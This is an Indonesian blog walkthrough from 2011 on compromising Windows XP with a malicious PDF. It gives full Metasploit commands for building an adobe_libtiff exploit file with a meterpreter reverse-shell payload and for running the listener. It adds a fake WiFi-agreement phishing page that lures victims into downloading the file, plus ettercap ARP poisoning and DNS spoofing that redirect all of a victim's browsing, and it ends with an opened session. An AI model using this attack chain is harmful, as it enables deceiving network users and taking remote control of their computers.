Jangan pernah jemu mempelajari penetration test. Kali ini saya akan berbagi, bagaimana cara mengeksploit windows XP dengan metasploit. Pada thread saya sebelumnya, saya telah menjelaskan tentang metasploit vs microsoft office word, dan kali ini giliran metasploit menghajar adobe reader. =)
Mengenai adobe reader, tentu saya membicarakan tentang file berekstensi .pdf kali ini kita akan membuat file PDF jahat, yang memicu vulnerability sebuah system.
Requirements:
1. metasploit
2. apache2
3. ettercap
Briefing:
1. Gunakan metasploit untuk membuat file PDF yang disisipkan PAYLOAD
2. Gunakan apache 2 untuk membuat halaman tipuan, agar korban masuk dalam jebakan untuk mengunduh file PDF tersebut.
3. Gunakan ettercap untuk mengalihkan halaman korban, ke index apache2 kita
Walkthrough:
1. Buka terminal, lalu masukan perintah
root@red-dragon:/# msfconsole
2. Langkah berikutnya, buat file PDF jahat dengan metasploit, kemudian lakukan pengaturan exploit.
msf > use exploit/windows/fileformat/adobe_libtiff
msf exploit(adobe_libtiff) > show options
Module options (exploit/windows/fileformat/adobe_libtiff):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
Exploit target:
Id Name
-- ----
0 Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)
msf exploit(adobe_libtiff) > set FILENAME Tugas.pdf
FILENAME => Tugas.pdf
msf exploit(adobe_libtiff) > setg OUTPUTPATH /root
OUTPUTPATH => /root
msf exploit(adobe_libtiff) > setg PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_libtiff) > setg LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(adobe_libtiff) > setg LPORT 4444
LPORT => 4444
msf exploit(adobe_libtiff) > exploit
[*] Creating 'Tugas.pdf' file...
[*] Generated output file /root/.msf4/data/exploits/Tugas.pdf
msf exploit(adobe_libtiff) >
3. Gunakan exploit multi handler untuk mengekploitasi korban ketika korban terpicu oleh exploit dan payload yang kita kirim.
msf exploit(adobe_libtiff) > use exploit/multi/handler
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.56.101 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.101:4444
[*] Starting the payload handler...
4. Copy file pdf tadi ke direktori apache 2
root@red-dragon:/# cp /root/.msf4/data/exploits/Tugas.pdf /var/www/
5. Edit index.html di /var/www/ seperti ini.
<html>
<head>
<title>Warning!!!</title>
</head>
<body>
<p align="center" class="style2"><u><b>Perhatian:</u></b>Anda harus membaca persetujuan penggunaan WiFi terlebih dahulu sebelum melanjutkan aktifitas browsing anda. Unduh persetujuan di bawah ini.</p>
<p align="center">
<input align="center" type="button" name="Button" value="Download persetujuan" onClick="window.open('/Tugas.pdf','download'); return false;"></p>
</body>
</html>
6. Gunakan ettercap untuk mengalihkan setiap halaman yang diakses korban ke alamat, kali ini kita akan menggunakan plug in dns_spoof =)
root@red-dragon:/# nano /usr/share/ettercap/etter.dns
Ubah menjadi seperti ini.
* A 192.168.56.101
Kemudian eksekusi ettercap dns_spoof untuk mengalihkan setiap halaman web yang diakses korban, ke index.html yang telah kita buat tadi. =)
root@red-dragon:/# ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.56.1/ /192.168.56.50/
Keterangan:
/192.168.56.1/ adalah IP address akses poin, ini adalah target 1
/192.168.56.50/ adalah IP address korban
7. Korban akan selalu menuju halaman index.html, APAPUN alamat web yang diakses, ia akan SELALU menuju ke halaman tersebut, dan setelah ia mengunduh file, kemudian membuka file tersebut, kita akan masuk ke dalam sesi meterpreter.
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.101:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.50
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.50:1908) at Mon Oct 23 11:14:55 2011
meterpreter >
Created by: red-dragon
Thanks to: metasploit [for your greatness]
ettercap [for your intercepting ability]
Yoshephine Handini [For your support by SMS =)]
blue-dragon [for idea]
October 23, 2011
Subscribe to:
Post Comments (Atom)
0 comment:
Post a Comment